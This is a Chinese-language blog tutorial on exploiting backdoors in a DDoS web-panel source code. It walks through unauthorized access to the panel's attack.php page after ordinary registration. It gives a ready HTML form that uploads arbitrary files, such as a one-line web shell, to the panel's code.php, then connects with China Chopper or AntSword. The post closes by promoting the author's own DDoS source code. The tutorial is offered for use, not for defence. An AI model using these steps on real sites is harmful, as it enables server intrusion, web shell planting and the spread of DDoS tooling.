【原创首发】某DDOS页端源码后门利用教程

前一段时间,发了一篇文章《对某DDOS页端源码的一次简单审计》

这篇文章很受欢迎但是很多人不会利用后门,我今天也就说一下后门利用方法 手动滑稽哈哈哈

好了话不多说我们开始教程!

后台越权访问

我们前台注册

账号密码随便输入即可,很随便那种 哈哈哈

然后登录,将URL改为

http(s)://目标站域名/后台地址/attack.php

然后就可以看到他的服务器/API

这个也是比较鸡肋的,我们需要知道后台地址.

任意文件上传

首先我们写一个html 如下

<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
<form action="http(s)://目标站域名/后台地址/code.php" method="post" enctype="multipart/form-data">
	<label for="file"></label>
	<input type="file" name="file" id="file">
	 <input type="submit" name="t" value="上传">
</form>
</body>
</html>

打开这个html如图

我们选择我们的一句话进行上传即可 上传后一句话在

http(s)://目标站域名/后台地址/admin/上传的文件名

菜刀直连后门

这里我们打开中国蚁剑/中国菜刀

添加数据输入

全文至此,需要帮忙审计其他源码的可以评论联系我哦!

推荐一下我的DDOS源码(由此源码演变而来) 获取地址 《路人DDOS源码》